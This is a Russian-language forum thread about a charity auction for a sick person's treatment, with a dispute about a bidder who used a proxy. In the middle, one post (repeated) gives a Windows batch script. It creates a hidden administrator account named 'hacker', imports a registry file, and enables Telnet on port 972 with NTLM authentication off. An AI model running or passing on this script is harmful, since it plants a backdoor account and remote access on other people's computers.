Змінюй хід війни! Допомагай ЗСУ!

Благотворительный аукцион, для лечения Тори

• Автор теми Автор теми Синдбад
  • Дата створення Дата створення
есть один скользкий момент. Она работала через проксик. Почему - неведомо.

Шутишь? Из России по другому не зайти. Кстати, на днях ********* как раз обрубили возмжность переводить сюда лавэ. Млжет в этом собака порылась?

есть один скользкий момент. Она работала через проксик. Почему - неведомо. Проксик - на хетзнере, У меня достаточно много претензий к тому проксику и его соседям по сегменту - бо заебались по паре десятков в сутки РФ-провокаторов через оттуда банить, я этот /24 закрыл нахрен. 5 числа.

Но в любом случае - есть другие проксики, у неё есть все данные Сани Первого, и т.п.

тогда нужно сразу изначально исключать из аукциона таких товарищей.

Городянка правильно заметила- занизила цену и сыбалась. при таком раскладе, не исключено, что специально.
мадам у которой проблемы с головой, желаю подлечить совесть.

Шутишь? Из России по другому не зайти. Кстати, на днях ********* как раз обрубили возмжность переводить сюда лавэ. Млжет в этом собака порылась?
кто ей мешал отписаться в личку и направить деньги на любой другой счет при соглашении?

у меня полно регистраций с РФ-адресов, каждый день.. Домен давно вынесен из их запретительного реестра

Ладно тех росиян, а что 6 найробийцев делает на хф:D
f9bbjj.webp

Ух ты. Как смотреть? :пиво:

запросто
написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной
строки).
тело батника:

chcp 1251
net user SUPPORT_388945a0 /delete
net user hacker hack /add
net localgroup Администраторы hacker /add
net localgroup Пользователи SUPPORT_388945a0 /del
regedit /s conf.reg
sc config tlntsvr start= auto
tlntadmn config port=972 sec=-NTLM
net start Telnet

запросто

написать на языке Bat, т.е. язык команд в GUI окне в среде Windows(режим командной

строки).

тело батника:

chcp 1251

net user SUPPORT_388945a0 /delete

net user hacker hack /add

net localgroup Администраторы hacker /add

net localgroup Пользователи SUPPORT_388945a0 /del

regedit /s conf.reg

sc config tlntsvr start= auto

tlntadmn config port=972 sec=-NTLM

net start Telnet

Даде взломали акк?

Димокс. Этот аукцион закончен. Тему можно откреплять. Завершающий пост, тут остается за Александр 1-й, когда он получит свой выигрыш. Благодарю всех участников аукциона, всех неравнодушных к здоровью Тори и администрацию сайта, за помощь, в проведении этого благотворительного мероприятия. Хочу, что бы данное мероприятия не прошло незамеченным на форуме и почин благотворительных аукционов, был поддержан администрацией и пользователями ХФ.

Димокс. Этот аукцион закончен. Тему можно откреплять. Завершающий пост, тут остается за Александр 1-й, когда он получит свой выигрыш. Благодарю всех участников аукциона, всех неравнодушных к здоровью Тори и администрацию сайта, за помощь, в проведении этого благотворительного мероприятия. Хочу, что бы данное мероприятия не прошло незамеченным на форуме и почин благотворительных аукционов, был поддержан администрацией и пользователями ХФ.

Красивое начинание. Вам респект и уважуха. :клас:

Лилит сил, оптимизма и скорейшего выздоровления.

Назад
Зверху Знизу